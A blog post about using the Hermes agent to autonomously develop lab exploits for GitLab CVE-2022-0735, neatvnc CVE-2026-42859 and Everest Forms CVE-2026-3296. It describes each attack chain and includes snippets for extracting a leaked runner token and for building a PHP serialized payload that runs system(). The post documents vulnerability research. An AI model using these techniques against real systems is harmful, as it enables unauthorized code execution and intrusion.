We hit record on the CVE Demo video and only then realized we hadn't picked a CVE.

Most weeks we'd already have a candidate queued up - the EIP MCP server runs all day, and we triage targets on our own time. But the video was already rolling, the agent was waiting, and stopping to pick one off-camera would have been the wrong kind of edit. So we improvised. We typed:

Can you please use the eip-mcp to search for interesting candidates for cve research and poc creation. We're looking for well known, open-source projects, with no existing exploits in eip. What interesting candidates can you find?

The agent goes to work. A minute later it comes back with nine CVEs, ranked into three tiers, each annotated with CVSS, EPSS, pre-auth status, exploitation strategy, and source-code availability. Then a recommendation:

My top pick would be CVE-2022-0735 - CVSS 10.0, no exploit, pre-auth, clear exploitation path (steal token → rogue runner RCE), and GitLab source is fully available.

Want me to start the CVE workflow on any of these? Pick one and I'll load cve-router-triage and begin.

We type back four words:

I love your pick.

It loads the first skill and starts running.

We have been doing this work for a few months. We have never typed "I love your pick" at any part of it before. We also have never improvised our way into a CVE pick on camera before. Hermes did not flinch at either.

This is what working with Hermes feels like. The pipeline itself is autonomous - same shape as the forge tools we've been running for months. But when something messy happens at the edges of the work - an improvised target, a clarifying question, a follow-up two hours after the run completes - the agent stays in the conversation. By the time the run finishes, it will have built a Docker lab, extracted a runner token from the GitLab API, registered a rogue runner, demonstrated RCE, written a disclosure draft, and updated its own skill library with what it learned. All of it inside one conversation we can still talk to.

This post is about what that small but profound shift unlocks.

What we'd been doing

A quick recap, because the contrast matters.

We've built a stack of autonomous forge tools - CVEForge for end-to-end exploit development, StackForge for binary exploitation, FuzzForge for source fuzzing, and an internal durable pipeline that wraps them in Temporal. All of those started as forks of Shannon - the foundation we keep coming back to, the project that taught us what an autonomous research pipeline could look like.

The autonomous-dispatch model is genuinely powerful. We've used it to run 24 CVEs in 72 hours, to ship zero-to-RCE results across three vulnerability classes, to take xrdp from crash to RIP control - and eventually to a shell. The autonomy is the feature. When you have 24 CVEs to grind through overnight, you do not want a chat window in the loop.

That's not going anywhere. We still use it. This post isn't about replacing it.

The shape we wanted

There's a different mode of work, though. The one we keep falling into when a single CVE turns out to be hard.

In that mode, you're not dispatching a job. You're doing research. You want to see the candidate list before the agent commits to one. You want to peek at the intel brief and ask why it ranked that bug above the other one. When the PoC lands, you want to discuss what it implies before the pipeline charges into the report phase. And when the run is over, you want to keep poking - what if we try this over WebSocket? What about the same RPC interface on Server 2022? Could a defender catch this in the logs? The agent should still be there, with everything it just learned, ready to keep going.

The conversational thread is the thing. Not less autonomy - additional addressability. And after the run lands, persistence.

Hermes, the self-improving agent runtime by Nous Research, gives us exactly that.

What Hermes is

A quick technical sketch, because the architecture is the point.

Hermes is an agent runtime. You install it locally - there's a gateway process, a dashboard, a Kanban board for task tracking, a persistent session store. The agent talks to a model (we run a local Ollama for short hops and an upstream model for the heavy work) and pulls context from a Honcho memory backend, which gives it long-term recall across sessions.

There are three persistence layers worth naming:

  1. SOUL.md - a single file that defines the agent's personality and tone. Edit it, the agent's voice changes on the next message. No restart.
  2. ~/.hermes/memories/MEMORY.md and USER.md - auto-memory the agent maintains itself. After a long session, the agent reviews what was learned and writes it back here. Next session starts with that context already loaded.
  3. ~/.hermes/sessions/*.json - full conversation transcripts, retained. You can resume any past session and keep going.

Then there are skills - modular instruction packages that Hermes loads on demand. The CVE pipeline ships as a tree of skill files inside eip-hermes itself: cve-router-triage, cve-web-generic, cve-memory-linux, cve-poc-validation, cve-report-disclosure. When the agent decides a task fits a skill, it loads it. When it's done, it hands off to the next skill with a structured === SKILL HANDOFF === block.

MCP is wired in by default. The agent has eip-mcp for vuln intelligence, semgrep for static analysis, ghidra-headless-mcp for binary work. Add more by dropping config; the agent picks them up.

We stood all of this up with one installer - eip-hermes. One bootstrap script for sudo, one drop-in install.sh for the control plane, the skills, the MCP wiring, and the security toolchain. Ubuntu 24.04 host. Native services bind 127.0.0.1. The whole control plane runs as a regular user under ~/.hermes/.

A note on scope: our eip-hermes setup is intentionally minimal. The default plan brings up the control plane, the skills, the MCP wiring, and a local Ollama; it does not yet integrate Open WebUI, Langfuse, the mcpo OpenAPI bridge, Multica, or several other Hermes-ecosystem components that the broader community has been wiring in. If you want a richer view of what Hermes can be, Akshay Pachaar's community walkthrough on X is the best single tour we've found, and a much fuller setup than ours. We treat ours as a clean, reproducible baseline for CVE research; everything else is improvement space.

Part 1 of our own four-part video series walks through the eip-hermes install end to end on a fresh Ubuntu 24.04 host - what gets installed, where it lives, and how to verify the control plane comes up clean:

That's the runtime. Now the runs.

Run 1: CVE-2022-0735 - GitLab info-disclosure to RCE

The cold open above is the actual start of this run. What we didn't show was everything before "I love your pick" - the boring but important warm-up. We opened with a tool healthcheck ("do a quick mcp tool healthcheck, and make sure you are familiar with our eip-skills and their ROUTING-DOCTRINE.md"), then asked Hermes to use the EIP MCP server to surface CVEs worth working on. The nine-CVE tiered shortlist came out of that. The recommendation was its own.

The vulnerability itself is a beauty: an authenticated GET against GitLab CE 14.8.1's project API returns the runners_token in the JSON response - to any logged-in reader of the project, which on a public project is anyone willing to create a free user account and claim the Reporter role. With that token, an attacker registers a rogue GitLab Runner that picks up CI jobs and executes arbitrary code. CVSS 10.0. Patched in 14.8.2.
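The leak reduces to one JSON field that should never have been in the response. A minimal Python sketch of the detection step - the response bodies are trimmed stand-ins for the real /api/v4/projects/:id payload (which carries dozens more fields), the token value is the one captured in this run's artifacts, and the authenticated GET itself is elided:

```python
import json

def extract_runners_token(project_json: str) -> "str | None":
    """Pull the leaked runners_token out of a GitLab /api/v4/projects/:id
    response body. On hardened builds the field is simply absent for
    Reporter-level callers, so we return None."""
    data = json.loads(project_json)
    return data.get("runners_token")

# Trimmed stand-ins for the 14.8.1 (leaky) and 14.8.2 (patched) responses.
leaked = '{"id": 42, "name": "demo", "runners_token": "sEjRS5wgFVtg95Wpmyzu"}'
patched = '{"id": 42, "name": "demo"}'

print(extract_runners_token(leaked))   # token present on 14.8.1
print(extract_runners_token(patched))  # None on a patched build
```

Everything after this point is ordinary GitLab Runner mechanics: the token registers a runner, the runner picks up CI jobs, the jobs run attacker-controlled commands.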

(The upstream advisory rates the CVE PR:N based on a separate /api/v4/projects/:id/notes quick-actions vector that was reachable anonymously on older versions in the affected range. On the 14.8.1 build we used, both that vector and the projects-detail field had already been hardened against anonymous callers; the lab demonstrates the Reporter-level path that was still open in 14.8.1. We confirmed this with a direct probe during smoke-testing. The agent's "pre-auth" tag in the shortlist above was optimistic for this specific build.)

After "I love your pick," Hermes ran. Intel brief, lab setup, PoC development, verification, disclosure draft - the same craft our internal CVEForge embodies, kicked off by a target we'd improvised our way into thirty seconds earlier.

The full lab and PoC are published at eip-pocs-and-cves/CVE-2022-0735/ - one docker compose up -d, one bash seed.sh, one python3 poc/poc.py http://127.0.0.1:8080 <api_token>, and you're at the same place. Final artifacts in ~/exploit-intel/labs/CVE-2022-0735/:

INTEL.md           - full CVE intel block with root cause analysis
lab/
  docker-compose.yml
  seed.sh
poc/exploit.py     - API leak → token theft → runner registration → RCE
artifacts/
  token-leak.txt   - captured runners_token sEjRS5wgFVtg95Wpmyzu
  response-leak.json
  runners-list.json - rogue runner #2 registered
  container-logs.txt
report.md          - verdict: [SUCCESS], full chain demonstrated

The agent improves itself

Then the part that matters most for this whole post. After the run completed, we asked Hermes to do something the batch-dispatch model structurally cannot do - look back at the session it just ran and improve its own documentation.

The prompt is explicit about the signals to look for: places where the user corrected the agent's workflow or format, places where a non-trivial technique emerged, places where a skill that was loaded turned out to be wrong or missing a step, places where the agent and the user felt friction. Every one of those is a candidate for a skill update.

Review the conversation above and update the skill library. Be ACTIVE - most sessions produce at least one skill update, even if small. A pass that does nothing is a missed learning opportunity, not a neutral outcome.

... Signals to look for: User corrected your style, tone, format, legibility, or verbosity ... User corrected your workflow, approach, or sequence of steps ... Non-trivial technique, fix, workaround, debugging path, or tool-usage pattern emerged that a future session would benefit from ... A skill that got loaded or consulted this session turned out to be wrong, missing a step, or outdated. Patch it NOW.

This is what Nous Research calls self-improving agents - the framing they put right at the top of the hermes-agent README. It is not a side feature; it is central to how Hermes is meant to be used. The agent reads its own session as a critic. It looks at what it actually did, what it actually said, where the human pushed back. Then it picks the right level to write the lesson back into: patch a currently-loaded skill, broaden an existing umbrella, add a references/ file under an existing skill, or - last resort - create a new class-level umbrella.

Look at what is not happening in that loop. Nobody is updating a Confluence page that will be archived without being read. Nobody is filing a "lessons learned" ticket that gets triaged into a backlog the team will spelunk through six months from now. The lesson goes back into the place the agent will actually consult the next time it does the work.

For this session, Hermes reviewed its own 240-message run, identified what was new - the runners-token primitive, the docker-compose pattern for GitLab CE labs, the specific shape of the quick_actions_status API response, the chain from leak to runner registration to CI RCE - and wrote it into the skill library. The next time we hand it a GitLab CVE, it starts with that. The next time we hand it any CVE that involves an authenticated API leaking a privileged token, it starts with that too.

The whole chain - from "find me a CVE" to "the agent knows more than it did before" - lived inside one conversation.

Part 2 of the video series is the source for the cold open above: the quick MCP healthcheck, the improvised candidate search through the EIP MCP server, the agent's tiered shortlist, and the run starting on CVE-2022-0735:

Run 2: CVE-2026-42859 - neatvnc pre-auth stack overflow

CVE-2026-42859 is a pre-authentication stack buffer overflow in neatvnc's RSA-AES handshake. rsa_aes_send_challenge() declares uint8_t buffer[1024] on the stack, then calls crypto_rsa_encrypt() with the attacker-controlled RSA key size as the output buffer length. Send a 65536-bit RSA public key during the VNC handshake and you overflow the stack by seven kilobytes before any credentials are checked. CVSS v4 8.1. Patched in 0.9.6.
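The overflow arithmetic is worth making concrete. The buffer size comes from the vulnerable declaration quoted above; the key sizes are illustrative:

```python
# Why a 65536-bit client RSA key smashes rsa_aes_send_challenge()'s
# stack frame: crypto_rsa_encrypt() is handed the attacker-controlled
# key size as the output length, so the ciphertext written into the
# fixed uint8_t buffer[1024] is key_bits / 8 bytes long.
BUFFER_BYTES = 1024  # uint8_t buffer[1024] on the stack

def overflow_bytes(key_bits: int) -> int:
    """Bytes written past the end of the stack buffer for a given
    client RSA key size (0 if the ciphertext fits)."""
    return max(0, key_bits // 8 - BUFFER_BYTES)

print(overflow_bytes(8192))    # an 8192-bit key fills the buffer exactly: 0
print(overflow_bytes(65536))   # the PoC key: 7168 bytes, i.e. 7 KB past the frame
```

That 7 KB of pre-authentication overwrite is what the rest of the run chases.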

Unlike the GitLab run, this one was deliberate. We had a CVE in mind. We went to exploit-intel.com, plugged the ID into the search bar, landed on the CVE page, read the GHSA advisory, and decided the impact statement was ambiguous enough to be worth a real look. The kind of thing you flag at the start of a research day, not the kind you stumble into on camera. By the time we opened Hermes, the homework was done. The agent was getting a target, not a question.

Where the GitLab run was a conversation, this one was a dispatch. We gave Hermes the right framing up front and let it run:

Good afternoon Hermes. I would like to pass CVE-2026-42859 down the CVE pipline. This is a memory corruption vulnerability, so build the lab with the least restrictive memory protections. Good luck!

That session went 316 model turns on two user messages, in about forty minutes wall-clock. We were not in the room for most of it. Build the lab. Compile neatvnc with -fno-stack-protector. Trigger the overflow. Confirm RIP overwrite. Document the exact byte offset, the saved-RBP location, the start of the canary-less stack frame. Write up checksec for the binary (NX on, PIE on, RELRO full, CET on, canary disabled - by design for this lab). File the disclosure with an honest impact-boundary section. Hand off.

That's dispatch autonomy from the same runtime that hosted the GitLab conversation an hour earlier. Same agent. Different shape of task.

The build alone surfaced a museum-grade collection of the small humiliations an aging C codebase reserves for new contributors. The neatvnc v0.9.5 source has have_working_h264_encoder() calling functions that are undefined when H.264 is disabled. The aml dependency needs ≥ 0.3.0 and Ubuntu 22.04 ships 0.2.1. The API renamed several functions between releases - nvnc_open() vs nvnc_new(), nvnc_enable_auth() vs nvnc_set_auth_fn(). AML_UNSTABLE_API=1 must be defined before including aml.h. RSA-AES type 5 and type 129 are only offered if NVNC_AUTH_REQUIRE_AUTH is set.

Hermes worked through all of it. And then - and this is the part we keep coming back to - it wrote it down. From ~/.hermes/memories/MEMORY.md on the lab host, the morning after the run:

CVE-2026-42859 (neatvnc v0.9.5 RSA-AES stack overflow) build pitfalls:
- aml dependency needs >=0.3.0; Ubuntu 22.04 only has 0.2.1.
  Fix: add subprojects/aml.wrap pointing at https://github.com/any1/aml.git
  branch v0.3.0, or build aml from source before neatvnc.
- v0.9.5 has a build bug: `have_working_h264_encoder()` in src/server.c line 123
  calls h264_encoder_create/destroy which are undefined when h264 is disabled.
  Fix: wrap that function in `#ifdef ENABLE_OPEN_H264 ... #endif`.
- neatvnc v0.9.5 API: `nvnc_open()` not `nvnc_new()`, `nvnc_enable_auth()` not
  `nvnc_set_auth_fn()`, `nvnc_fb_new()` not `nvnc_frame_new()`. Must define
  AML_UNSTABLE_API=1 before including aml.h.
- Server must have NVNC_AUTH_REQUIRE_AUTH set for RSA-AES (type 5) or
  RSA-AES256 (type 129) to be offered. Without auth, server only offers
  RFB_SECURITY_TYPE_NONE.
- Vulnerable function: rsa_aes_send_challenge() - uint8_t buffer[1024] on
  stack, overflow via oversized client RSA public key in crypto_rsa_encrypt()
  call.

The next time we put neatvnc anywhere near this agent - or anything aml-shaped, anything with that API rename pattern - it starts with that. The hour we spent paying tuition on the build is not a tax we pay again.

And here is the thing that lands harder the second or third time you do this with Hermes: what the agent delivered isn't an exploit. It is the part of the work you would otherwise spend a morning grinding through to get to. A working lab with the right vulnerable build. A reproducible crash. A documented PoC with its constraints labeled honestly. A docker-compose that survives a down -v. Forty minutes after lock-in, with no public exploit to copy from, all that remains is to start digging into the vulnerability. That part - the digging - is still ours.

The full neatvnc lab is published at eip-pocs-and-cves/CVE-2026-42859/. The Dockerfile clones the vulnerable v0.9.5 tag at build time and applies one small build-fix patch. PoC, artifacts, and vuln-server.c are all in the repo.

Part 3 of the video series walks through the full neatvnc run end to end - the lab build, the overflow trigger, and the 316-turn autonomous chase that ends with the server process aborting on __stack_chk_fail (DoS confirmed; RIP overwrite needs the library rebuilt without the canary, see the README):

Run 3: CVE-2026-3296 - Everest Forms PHP Object Injection

The pick this time was driven by the VulnCheck KEV list. CVE-2026-3296 landed on KEV on 2026-05-04, actively exploited in the wild, against a WordPress plugin (Everest Forms) with a six-figure active install base. The patch is the kind of thing that makes you want to read the diff yourself: a single function-call swap in one PHP file. Raw unserialize($meta_value) becomes evf_maybe_unserialize($meta_value). The safe wrapper, which passes ['allowed_classes' => false], was already in the same codebase. A past maintainer wrote it. Then everyone forgot to use it on the admin entry-view page.

The vulnerability class is PHP Object Injection (CWE-502). When an administrator opens the Everest Forms entries page, the plugin loops over each entry's stored meta values, runs is_serialized(), and calls raw unserialize() on anything that looks serialized. Any class loaded into the WordPress process becomes an instantiation candidate. With a POP gadget present - any class whose __destruct, __wakeup, or __toString has side effects - the chain becomes RCE as the WordPress process user.

The attacker fully controls the serialized payload: which class to instantiate, every public or protected property on it, the order of instantiation for nested objects. What the attacker doesn't control is the set of classes available. That is a property of the WordPress install, not the bug.

That single fact made the lab design a real decision. To demonstrate RCE end to end, we needed a class with an exploitable magic method present in the WordPress process. Three options: depend on a WordPress core gadget chain (WP_Theme, WP_HTTP_Cookie, the Requests_* family) and pin the lab to specific core class shapes that drift across releases; depend on a real third-party plugin's gadget and pin two vulnerable plugins instead of one; or ship a manufactured companion plugin whose only job is to provide a class with an exploitable __destruct(), label it clearly as lab scaffolding in every artifact, and keep the Everest Forms demonstration decoupled from gadget-availability churn.

We picked option three. The lab ships SEO Rank Reporter 2.1.0, a not-implausibly-shaped WordPress plugin whose Log_Cleanup class implements __destruct() { system($this->command); }. It is not on the WordPress.org plugin repository. It is not a real plugin. Every artifact in the CVE folder labels it as lab scaffolding. It exists because the CVE is a deserialization primitive, and primitives need targets.
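For illustration, here is what the injected meta value looks like on the wire - a minimal Python helper that emits PHP's serialize() encoding for an object with ASCII string properties. The class and property names are the scaffolding gadget's; the command string is a trimmed example, not the shipped payload:

```python
def php_serialize_object(cls: str, props: dict) -> str:
    """Emit the PHP serialize() encoding of an object whose properties
    are all ASCII strings - the shape a PHP Object Injection primitive
    feeds to unserialize()."""
    body = "".join(
        f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in props.items()
    )
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'

# The gadget's __destruct() runs system($this->command), so the property
# we set is the command line the WordPress process will execute.
payload = php_serialize_object("Log_Cleanup", {"command": "id > /tmp/pwned_rce"})
print(payload)
# O:11:"Log_Cleanup":1:{s:7:"command";s:19:"id > /tmp/pwned_rce";}
```

Stored as an entry meta value, that string passes is_serialized(), survives until an administrator opens the entries page, and instantiates the gadget inside the WordPress process.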

Verification is the part of this lab we're proudest of. The gadget runs system('id > /tmp/pwned_rce && hostname >> /tmp/pwned_rce && date >> /tmp/pwned_rce'). The PoC reads /tmp/pwned_rce back through a separate docker exec channel. The HTTP trigger response is a 500 (PHP throws a type error after __destruct() returns and the entries-view template tries to render the deserialized object as an associative array), but the 500 is not the signal: plenty of non-exploit things also produce a 500. The signal is a file that did not exist before the run, owned by www-data:www-data (proving PHP wrote it, not the host), containing uid=33(www-data), the container hostname, and a date matching this invocation (proving it ran this time, not residual state from a previous run). Five independent signals; all five must agree before the PoC declares [SUCCESS]. That kind of non-circular verification matters more on a deserialization bug than on most things - the temptation to call HTTP-500-after-trigger a success is real, and it would be wrong half the time.
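Sketched as code, the decision rule is an AND over all five signals - a hedged Python reconstruction, not the shipped PoC; the hostname and date values below are invented for the example:

```python
def verdict(marker: str, owner: str, hostname: str, run_date: str,
            existed_before: bool) -> bool:
    """All five signals must agree before declaring [SUCCESS]: the
    marker file is new, PHP wrote it, id ran as the web user, it names
    this container, and it carries this invocation's timestamp."""
    checks = [
        not existed_before,             # file did not pre-exist the run
        owner == "www-data:www-data",   # PHP wrote it, not the host
        "uid=33(www-data)" in marker,   # command ran as the web user
        hostname in marker,             # right container
        run_date in marker,             # this invocation, not residue
    ]
    return all(checks)

# Illustrative captured marker contents.
marker = "uid=33(www-data) gid=33(www-data)\nwp-lab-1\nMon May  4 12:00:00 UTC 2026\n"
print(verdict(marker, "www-data:www-data", "wp-lab-1",
              "May  4 12:00:00", existed_before=False))  # True
```

Flip any one input - a pre-existing file, a host-owned file, a stale date - and the verdict drops to False, which is exactly the non-circularity the paragraph above argues for.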

The full lab is at eip-pocs-and-cves/CVE-2026-3296/. The Dockerfile pulls Everest Forms 3.4.3 from downloads.wordpress.org at image-build time and stages WP-CLI for seeding. The seed.sh script is idempotent. The PoC is stdlib-only Python: urllib, http.cookiejar, ssl, subprocess. KEV listing 2026-05-04; discovery credit 0xsabre.

Part 4 of the video series walks through the full Everest Forms run end to end - the lab build, the gadget-plugin reasoning, the payload injection, and the out-of-band verification firing:

The persistence is the unlock

Look at what just happened across the three runs.

In the GitLab session, Hermes turned a hot-mic improvisation into a clean target pick, ran the whole pipeline, and - after the work was done - reviewed its own session and updated its own skill library with what it had learned. The API leak pattern. The docker-compose layout. The runner registration sequence. Next session starts there.

In the neatvnc session, Hermes ran 316 turns on two user messages - the same level of autonomy our batch pipelines give us - and left behind a structured set of build notes that the agent itself reads on the next neatvnc-adjacent run. Next session starts there too.

In the Everest Forms session, Hermes pulled a KEV-listed CVE off the watchlist, made a sharp lab-design call we'd otherwise have had to spell out by hand (the manufactured gadget plugin instead of a brittle WordPress-core dependency), and shipped a non-circular verification model that the next deserialization-class CVE inherits for free. Next session starts there too.

That's the part the autonomous-dispatch model structurally can't do. A fire-and-forget pipeline finishes, drops a report, and dies. The next run starts cold - same prompts, same skills directory, same fresh agent. Any institutional memory has to be hard-coded into the skill files between runs, by us, manually.

Hermes inverts it. The skills are still there as the canonical instruction set, but the agent maintains its own memory layer on top - MEMORY.md, USER.md, the session JSONs, the Honcho long-term store, and the skill-handoff blocks that flow between pipeline stages with structured state. Every run leaves the next run smarter.

This is what we actually mean when we say "research assistant" instead of "pipeline." A pipeline is something you run. An assistant is something that knows you, and the work, and last week's mistake.

"Won't memory get bogged down across runs?"

A fair question, and one the Hermes folks clearly thought about before we did.

The short answer: new sessions don't get the whole archive jammed into context. The standing context for a fresh session is small - SOUL.md, the MEMORY.md and USER.md auto-memory files (on our box they total under 2 KB), plus whatever skill the agent loads for the task at hand. Session transcripts sit on disk for retrieval, not for auto-injection. The Honcho backend retrieves on relevance, not by dumping every prior memory in.

The structural answer: Hermes ships with a curator. It's an auxiliary-model background process that wakes up when the agent has been idle for a couple of hours and the last curator run is older than interval_hours (7 days, by default), and reviews the agent-created skill collection. It can pin, archive, consolidate, or patch skills. Defaults out of the box: skills are flagged stale after 30 days of disuse and archived after 90. Pinned skills bypass auto-transitions. It never deletes, only archives, and archives are recoverable. The curator uses an auxiliary model client that doesn't share the main session's prompt cache, so its work can't pollute the conversation in progress.

The skill-update prompt we quoted earlier is the front-line filter: the agent is told explicitly NOT to capture environment-dependent failures, negative claims about tools that turned out to be fine, transient errors that resolved mid-session, or one-off task narratives. The curator is the longer-horizon backstop that catches what the front-line filter missed.

Most agent frameworks treat memory hygiene the way most landlords treat the heating: technically a feature, practically the tenant's problem. The Hermes curator is a first-class, scheduled, model-driven housekeeper that ships with the agent. Skills you've written by hand are off-limits to it. Skills the agent wrote can be pruned, but never destructively.

You still have to mind it. Auto-memory will accumulate stale facts; we treat that the way we'd treat a wiki - read it once in a while, prune the obvious. But the structural plumbing for "agent memory at scale" is already in place.

Pipelines as a verb, not a noun

The other thing worth naming: we did not throw away the pipeline.

The skills the agent loads in a Hermes session are recognizably the same craft we built into CVEForge. cve-router-triage for stage gating. cve-web-generic for HTTP-driven exploitation. cve-poc-validation for the verify pass. cve-report-disclosure for the writeup. Each one is a SKILL.md file with the same shape we've been refining for months - entry conditions, success criteria, artifact contracts, hand-off blocks.

What changed isn't the pipeline. It's the holder of the pipeline.

In the durable-CVE-pipeline model - and in CVEForge, StackForge, FuzzForge - the holder is a Temporal worker. It dispatches the skill, captures the output, hands it to the next worker, retries on failure, checkpoints state. The pipeline is a noun. A thing you start.

In Hermes, the holder is the agent you're talking to. Same skill files. Same artifact contracts. Same hand-off blocks. But the pipeline is now a verb - something the agent does, between or during the conversation it's having with you. The PoC isn't dropped at your feet; it's delivered, by someone who can answer questions about it.

That distinction sounds small. In practice it changes the entire shape of a research day.

Work that moved, not work that vanished

It's worth pausing on what that shift costs - or doesn't.

Our previous forge projects (CVEForge, StackForge, FuzzForge, and the internal durable pipeline) sit at roughly 30,000 lines of code between them, not counting the security toolchain or the lab orchestration. That's not bloat. It's what you need to be a good Temporal-backed orchestrator: stage gating, retry policies, checkpointing, durable timers, workflow versioning, activity contracts, observability hooks, cost tracking, resume logic, replay safety. Earning the word "durable" is real engineering. We'd build it again. For batch dispatch, we do still run it.

The Hermes version of the same pipeline boils down to a directory of skill files. One SKILL.md per stage, a references/ folder for the gnarly details, optional templates/ and scripts/ when a stage needs them. The hand-off contracts that the Temporal version encodes in TypeScript activity definitions are expressed here as a few lines of structured markdown. That is the whole orchestration layer.
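Concretely, the layout looks something like this - an illustrative tree built from the stage names mentioned in this post; the per-stage contents are placeholders, not a listing of the actual repo:

```
skills/
  cve-router-triage/
    SKILL.md            # entry conditions, gate criteria, hand-off contract
  cve-web-generic/
    SKILL.md
    references/         # the gnarly details a stage pulls in on demand
  cve-poc-validation/
    SKILL.md
    templates/          # optional, when a stage ships boilerplate
    scripts/            # optional helper scripts
  cve-report-disclosure/
    SKILL.md
```

The hand-off block at the bottom of one SKILL.md names the artifacts the next stage may assume exist; that few lines of structured markdown is the whole inter-stage contract.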

We don't want to reduce 30k LoC of careful engineering to "you could've just written markdown" - that is not what happened, and it would not be fair to the work. What changed is the runtime that holds the pipeline. With Temporal as the holder, the orchestration intelligence has to live in code, because Temporal is a state machine, not a planner. With an LLM agent as the holder, the orchestration intelligence lives in the model itself, and the skills only need to encode the parts the model wouldn't get right on its own - the artifact contracts, the gate criteria, the gotchas, the conventions.

Watching a few months of careful engineering distill into a directory of markdown is humbling. It also clarifies what those months were really teaching us: not how to write a pipeline, but how to write the skills the next pipeline would need.

It's not less work. It's work that moved.

Worth saying clearly: every one of those forge projects has stayed inside the labs. eip-hermes - what we're calling the EIP Harness - is the first time EIP pipeline craft has shipped in public form. Same shape, distilled, in a tree of skill files anyone can clone, audit, and extend. We are publishing win11-forge alongside it, so the Windows kernel and usermode lab plumbing comes out of the box.

What it doesn't replace

Hermes is the right tool for active, focused research on a single CVE. It is not the right tool for everything we do.

When the job is "run 24 CVEs through the pipeline overnight and mail me the reports," we still reach for our internal forge tools - CVEForge, StackForge, FuzzForge, the durable pipeline. Those are batch dispatchers, and they want a job queue, not a conversation partner. The 72-hours-24-CVEs work would have taken substantially longer if every run paused to check in with us.

When the job is "we got a tip about a CVE class and want to sweep the EIP database for variants, then queue twenty exploit-dev runs," same answer. The conversational layer is wasted on a workflow where the human isn't planning to read the output until tomorrow morning.

We use both. The internal forge tools still grind through batches overnight. Hermes added the other half of the workflow - heads-down research mode on a single hard problem, with an agent that doesn't vanish at the end of the run.

Different tools for different shapes of work. Both autonomous. Only one of them stays at the keyboard.

Try it

Two of the six links below are shipping in public for the first time today.

  • eip-hermes (first public release) - the EIP Harness installer. One bootstrap script, one drop-in, Ubuntu 24.04. Brings up the Hermes control plane, the EIP CVE skill tree, the MCP wiring, and our security toolchain. MIT.
  • win11-forge (first public release) - the Windows lab and orchestration. Builds a Win11 24H2 gold image once; spawns kernel-debug lab pairs with live WinDbg MCP endpoints in minutes. Includes the skill library for Windows kernel and usermode CVE research. MIT.
  • eip-pocs-and-cves - our public collection of CVE labs and PoCs. The three CVEs from this post live at CVE-2022-0735/, CVE-2026-42859/, and CVE-2026-3296/. Each entry is self-contained: Docker lab, stdlib-only PoC, intel brief, vulnerability analysis, verification report, build report, captured artifacts.
  • hermes-agent - the upstream agent itself, by Nous Research. MIT-licensed, self-improving, model-agnostic (works with Nous Portal, OpenRouter, NVIDIA NIM, OpenAI, local Ollama, or your own endpoint). Docs at hermes-agent.nousresearch.com. The thing this whole post is about.
  • Shannon - the autonomous-research framework every forge tool we've shipped (CVEForge, StackForge, FuzzForge, the durable pipeline) is a fork of. Different shape of agent than Hermes; sibling in our toolchain.
  • EIP MCP Server - 17 tools, real-time vulnerability intelligence, free, no API key.

Run ./bootstrap-user.sh then ./installers/hermes/install.sh, give the agent half an hour to come up, type "hi hermes", and ask it what it wants to work on. The first answer will probably be a tiered shortlist of CVEs, with a recommendation, and a question.

That's how research is supposed to feel.

(Yes, we've typed "pipline" a few times. Hermes has not once corrected our spelling. In this respect it is more polite than most colleagues.)
